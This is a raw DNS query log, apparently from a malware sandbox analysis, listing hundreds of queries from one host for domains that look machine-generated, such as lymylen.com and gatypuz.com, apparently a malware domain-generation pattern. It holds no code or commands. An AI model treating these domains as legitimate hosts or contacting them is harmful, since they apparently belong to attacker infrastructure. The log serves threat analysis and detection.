                                                                                                                                                                                                            Nov 11, 2024 18:07:58.988436937 CET192.168.2.91.1.1.10xb5b9Standard query (0)lymylen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.991930962 CET192.168.2.91.1.1.10x3fdbStandard query (0)volymuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.995116949 CET192.168.2.91.1.1.10xb5c5Standard query (0)vocyjik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.997525930 CET192.168.2.91.1.1.10x2fc2Standard query (0)pupypil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.997734070 CET192.168.2.91.1.1.10xe5beStandard query (0)qekynyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.997734070 CET192.168.2.91.1.1.10xdc90Standard query (0)vojybef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.998266935 CET192.168.2.91.1.1.10x63fStandard query (0)qetytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.998307943 CET192.168.2.91.1.1.10x3ce9Standard query (0)lyrytyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.998806953 CET192.168.2.91.1.1.10x3690Standard query (0)gahyvab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.999105930 CET192.168.2.91.1.1.10x56b4Standard query (0)puvyjiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.999368906 CET192.168.2.91.1.1.10x9a23Standard query (0)lyvyjoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.999782085 CET192.168.2.91.1.1.10x63f3Standard query (0)vonykam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.000050068 CET192.168.2.91.1.1.10x3c1aStandard query (0)qedysol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.004659891 CET192.168.2.91.1.1.10x4ec3Standard query (0)pufypuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.005060911 CET192.168.2.91.1.1.10x866bStandard query (0)vowykat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.005781889 CET192.168.2.91.1.1.10xa970Standard query (0)lygyvon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.007998943 CET192.168.2.91.1.1.10x3bebStandard query (0)puzygyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.008857012 CET192.168.2.91.1.1.10xe2c9Standard query (0)qexynyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.013504028 CET192.168.2.91.1.1.10x30d2Standard query (0)pumyleg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.026727915 CET192.168.2.91.1.1.10xf53bStandard query (0)galynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.027327061 CET192.168.2.91.1.1.10x58c6Standard query (0)qegyvag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.027520895 CET192.168.2.91.1.1.10xbca4Standard query (0)gatypuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.027674913 CET192.168.2.91.1.1.10xcf5bStandard query (0)gacyhuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.027993917 CET192.168.2.91.1.1.10x75f3Standard query (0)qebykoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.028240919 CET192.168.2.91.1.1.10xeec2Standard query (0)ganykah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.028704882 CET192.168.2.91.1.1.10xa3cStandard query (0)purytyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.028896093 CET192.168.2.91.1.1.10xad46Standard query (0)lykynyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.029350996 CET192.168.2.91.1.1.10xc50bStandard query (0)pujybev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.035470963 CET192.168.2.91.1.1.10x1594Standard query (0)gacynyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.035686970 CET192.168.2.91.1.1.10x7adeStandard query (0)vopyput.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.036482096 CET192.168.2.91.1.1.10xe76dStandard query (0)qegysiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.037823915 CET192.168.2.91.1.1.10x3dfcStandard query (0)lygysid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.037977934 CET192.168.2.91.1.1.10xe9fbStandard query (0)qetylel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.040560961 CET192.168.2.91.1.1.10x8e00Standard query (0)purylal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.043531895 CET192.168.2.91.1.1.10x168aStandard query (0)lyvymun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.043706894 CET192.168.2.91.1.1.10x42dStandard query (0)vocymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.050177097 CET192.168.2.91.1.1.10x8ba9Standard query (0)puvymug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.054162025 CET192.168.2.91.1.1.10xbaedStandard query (0)lyryler.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.059351921 CET192.168.2.91.1.1.10x4e69Standard query (0)vojydoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.065299988 CET192.168.2.91.1.1.10x453fStandard query (0)gahydos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.065815926 CET192.168.2.91.1.1.10xb569Standard query (0)pujydap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.066787958 CET192.168.2.91.1.1.10xc3a0Standard query (0)gatyzyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.066883087 CET192.168.2.91.1.1.10xc3d7Standard query (0)qebyqig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.072500944 CET192.168.2.91.1.1.10x4b83Standard query (0)vopyzyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.075186014 CET192.168.2.91.1.1.10x63b0Standard query (0)lykyfax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.075349092 CET192.168.2.91.1.1.10x420eStandard query (0)vonyqof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.077470064 CET192.168.2.91.1.1.10xb56fStandard query (0)pumywov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.077919006 CET192.168.2.91.1.1.10xedd0Standard query (0)lysyxuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.078843117 CET192.168.2.91.1.1.10x5c90Standard query (0)qedyxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.085432053 CET192.168.2.91.1.1.10x3796Standard query (0)volygyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.085624933 CET192.168.2.91.1.1.10x14a5Standard query (0)pupyxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.089590073 CET192.168.2.91.1.1.10x8028Standard query (0)galyfez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.129842997 CET192.168.2.91.1.1.10xd608Standard query (0)ganyqib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.009656906 CET192.168.2.91.1.1.10x5d36Standard query (0)vopybyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.012525082 CET192.168.2.91.1.1.10xd49cStandard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.019373894 CET192.168.2.91.1.1.10xa905Standard query (0)pujyjav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.023158073 CET192.168.2.91.1.1.10xf870Standard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.023590088 CET192.168.2.91.1.1.10x300cStandard query (0)lykyjad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.023772001 CET192.168.2.91.1.1.10xdb36Standard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.070718050 CET192.168.2.91.1.1.10x1f8fStandard query (0)galykes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.075064898 CET192.168.2.91.1.1.10x17cStandard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.852376938 CET192.168.2.91.1.1.10xff3bStandard query (0)qedytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.683496952 CET192.168.2.91.1.1.10x3f07Standard query (0)volymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.687410116 CET192.168.2.91.1.1.10x8b83Standard query (0)puzymig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.688153982 CET192.168.2.91.1.1.10x5cc2Standard query (0)qexyqog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.696304083 CET192.168.2.91.1.1.10x5e6dStandard query (0)qegyfyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.699851036 CET192.168.2.91.1.1.10x2a09Standard query (0)vocyqaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.700330019 CET192.168.2.91.1.1.10xa59dStandard query (0)puryxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.705403090 CET192.168.2.91.1.1.10x94f8Standard query (0)gacyqob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.715787888 CET192.168.2.91.1.1.10x1066Standard query (0)ganyzub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.719470024 CET192.168.2.91.1.1.10xec5bStandard query (0)gadydas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.720802069 CET192.168.2.91.1.1.10x8216Standard query (0)vowyzuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.721132040 CET192.168.2.91.1.1.10xb74aStandard query (0)lymylyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.721287012 CET192.168.2.91.1.1.10x1f36Standard query (0)lygyfex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.722676039 CET192.168.2.91.1.1.10xc5efStandard query (0)vofydac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.722810030 CET192.168.2.91.1.1.10x21edStandard query (0)pujygul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.723553896 CET192.168.2.91.1.1.10x829fStandard query (0)lyryxij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.723997116 CET192.168.2.91.1.1.10x1c3eStandard query (0)qebyrev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.724555016 CET192.168.2.91.1.1.10xf4b3Standard query (0)gaqyzuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.724661112 CET192.168.2.91.1.1.10xf428Standard query (0)lyxymin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.725223064 CET192.168.2.91.1.1.10x131eStandard query (0)lymytux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.730669022 CET192.168.2.91.1.1.10xc9efStandard query (0)qedyveg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.733673096 CET192.168.2.91.1.1.10xed1Standard query (0)lykymox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.734858036 CET192.168.2.91.1.1.10x9151Standard query (0)gacykeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.745229959 CET192.168.2.91.1.1.10x3297Standard query (0)purypol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.746881008 CET192.168.2.91.1.1.10xb10dStandard query (0)qegynuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.747107983 CET192.168.2.91.1.1.10xe48cStandard query (0)puzyjoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.750976086 CET192.168.2.91.1.1.10xb915Standard query (0)ganyrys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.751328945 CET192.168.2.91.1.1.10x1b51Standard query (0)lyxyjaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.752770901 CET192.168.2.91.1.1.10x15adStandard query (0)qeqytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.753200054 CET192.168.2.91.1.1.10x4619Standard query (0)vofybyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.753428936 CET192.168.2.91.1.1.10x7886Standard query (0)pufybyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.766907930 CET192.168.2.91.1.1.10x31f0Standard query (0)qekyhil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.767261982 CET192.168.2.91.1.1.10x87baStandard query (0)lyvywed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.767755985 CET192.168.2.91.1.1.10x2550Standard query (0)gadyveb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.768512011 CET192.168.2.91.1.1.10x4775Standard query (0)gaqypiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.768788099 CET192.168.2.91.1.1.10x6565Standard query (0)gahyfyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.769119978 CET192.168.2.91.1.1.10x6c13Standard query (0)pumytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.769314051 CET192.168.2.91.1.1.10x5fa6Standard query (0)puvywav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.769429922 CET192.168.2.91.1.1.10x583cStandard query (0)volyjok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.777517080 CET192.168.2.91.1.1.10x3235Standard query (0)vojygut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.778326988 CET192.168.2.91.1.1.10xf4e0Standard query (0)gatycoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.779663086 CET192.168.2.91.1.1.10x312cStandard query (0)vopycom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.780620098 CET192.168.2.91.1.1.10xad88Standard query (0)vocykem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.780924082 CET192.168.2.91.1.1.10x3a4eStandard query (0)vojymic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.781086922 CET192.168.2.91.1.1.10x7965Standard query (0)puvylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.781467915 CET192.168.2.91.1.1.10xa3b3Standard query (0)pujymip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.781624079 CET192.168.2.91.1.1.10xa684Standard query (0)qebylug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.781774998 CET192.168.2.91.1.1.10xedd6Standard query (0)qeqylyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.781915903 CET192.168.2.91.1.1.10x8d08Standard query (0)vopydek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.782058001 CET192.168.2.91.1.1.10x558Standard query (0)pufydep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.782202005 CET192.168.2.91.1.1.10x1ebcStandard query (0)qexykaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.785626888 CET192.168.2.91.1.1.10xbbb0Standard query (0)gahynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.785960913 CET192.168.2.91.1.1.10xf37fStandard query (0)vonyryc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.786206007 CET192.168.2.91.1.1.10xfb27Standard query (0)vowypit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.787142038 CET192.168.2.91.1.1.10x7b18Standard query (0)qetyxiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.787442923 CET192.168.2.91.1.1.10x33b9Standard query (0)gatydaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.787580967 CET192.168.2.91.1.1.10x39bdStandard query (0)qetysal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.790153980 CET192.168.2.91.1.1.10x95cfStandard query (0)lyvylyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.798264980 CET192.168.2.91.1.1.10x121aStandard query (0)galyhiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.798913002 CET192.168.2.91.1.1.10x685dStandard query (0)lykygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.293679953 CET192.168.2.91.1.1.10x5898Standard query (0)lyrytun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.295531988 CET192.168.2.91.1.1.10xb166Standard query (0)puvyjop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.297997952 CET192.168.2.91.1.1.10x9c6fStandard query (0)qetytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.298811913 CET192.168.2.91.1.1.10x5d68Standard query (0)pujybyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.304805994 CET192.168.2.91.1.1.10x3dffStandard query (0)purytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.308789015 CET192.168.2.91.1.1.10x82caStandard query (0)lyvyjox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.312738895 CET192.168.2.91.1.1.10xa2eeStandard query (0)vojybek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.320918083 CET192.168.2.91.1.1.10xdfe3Standard query (0)vocyjic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.321012020 CET192.168.2.91.1.1.10x7853Standard query (0)ganykaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.321696997 CET192.168.2.91.1.1.10x4683Standard query (0)gatypub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.324470997 CET192.168.2.91.1.1.10x171cStandard query (0)gahyvew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.326215029 CET192.168.2.91.1.1.10xb5d0Standard query (0)vopypif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.328289032 CET192.168.2.91.1.1.10xf51aStandard query (0)gaqykab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.328737974 CET192.168.2.91.1.1.10xcbafStandard query (0)qebykap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.329168081 CET192.168.2.91.1.1.10x5068Standard query (0)qekynuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.329889059 CET192.168.2.91.1.1.10x31daStandard query (0)lygyvar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.329973936 CET192.168.2.91.1.1.10xc770Standard query (0)vonyket.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.330465078 CET192.168.2.91.1.1.10xd54cStandard query (0)vowykaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.329653978 CET192.168.2.91.1.1.10x14acStandard query (0)vojyrak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.330319881 CET192.168.2.91.1.1.10x9e70Standard query (0)lyvyvix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.333609104 CET192.168.2.91.1.1.10x6d98Standard query (0)pujyteq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.334167004 CET192.168.2.91.1.1.10x424Standard query (0)qebyvop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.336173058 CET192.168.2.91.1.1.10x6834Standard query (0)lykytej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.336283922 CET192.168.2.91.1.1.10xdd89Standard query (0)ganyvoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.341543913 CET192.168.2.91.1.1.10x7307Standard query (0)vopyjuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.342005968 CET192.168.2.91.1.1.10x416cStandard query (0)vonybat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.361254930 CET192.168.2.91.1.1.10x7e7Standard query (0)qekytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.365983963 CET192.168.2.91.1.1.10x11e4Standard query (0)lyvyfad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.368566990 CET192.168.2.91.1.1.10x31a9Standard query (0)qexysig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.369378090 CET192.168.2.91.1.1.10x1cabStandard query (0)qegylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.372051001 CET192.168.2.91.1.1.10x6ad9Standard query (0)lyrymuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.372561932 CET192.168.2.91.1.1.10xe6daStandard query (0)lykyxur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.374470949 CET192.168.2.91.1.1.10xd5bfStandard query (0)gacydib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.374743938 CET192.168.2.91.1.1.10xc898Standard query (0)volypum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.375715971 CET192.168.2.91.1.1.10xfd10Standard query (0)vopyqim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.376065016 CET192.168.2.91.1.1.10x2535Standard query (0)qebyfav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.377283096 CET192.168.2.91.1.1.10x4ba1Standard query (0)pujyxyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.378428936 CET192.168.2.91.1.1.10xc3c6Standard query (0)gatyqih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.395040035 CET192.168.2.91.1.1.10xd302Standard query (0)qetyquq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.395207882 CET192.168.2.91.1.1.10x3bfaStandard query (0)puvydov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.400800943 CET192.168.2.91.1.1.10x7eb6Standard query (0)vojyzyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.401289940 CET192.168.2.91.1.1.10x6fedStandard query (0)gahyzez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.401516914 CET192.168.2.91.1.1.10xdac3Standard query (0)vocydof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.401755095 CET192.168.2.91.1.1.10x25f4Standard query (0)purymuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.405853987 CET192.168.2.91.1.1.10xfcdbStandard query (0)qedykiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.406271935 CET192.168.2.91.1.1.10x663aStandard query (0)gaqynyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.407732010 CET192.168.2.91.1.1.10xa2d8Standard query (0)lyxysun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.408128023 CET192.168.2.91.1.1.10x44bfStandard query (0)vofykoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.408128023 CET192.168.2.91.1.1.10x1376Standard query (0)lysyjid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.408309937 CET192.168.2.91.1.1.10xd3b9Standard query (0)lygylax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.408478022 CET192.168.2.91.1.1.10x5030Standard query (0)gadykos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.408649921 CET192.168.2.91.1.1.10x5093Standard query (0)galypyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.409604073 CET192.168.2.91.1.1.10xedeeStandard query (0)lymyner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.410578012 CET192.168.2.91.1.1.10x9e5bStandard query (0)pupyjuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.410815954 CET192.168.2.91.1.1.10x722aStandard query (0)puzypug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.411041975 CET192.168.2.91.1.1.10x65bStandard query (0)pumybal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.411334991 CET192.168.2.91.1.1.10xf362Standard query (0)vowymyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.412936926 CET192.168.2.91.1.1.10x5af5Standard query (0)pufylap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.413113117 CET192.168.2.91.1.1.10x84ccStandard query (0)qeqynel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.413285971 CET192.168.2.91.1.1.10x5fe7Standard query (0)pupywog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.414033890 CET192.168.2.91.1.1.10x184aStandard query (0)qekyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.426631927 CET192.168.2.91.1.1.10xe8bcStandard query (0)vonygec.comA (IP address)IN (0x0001)false
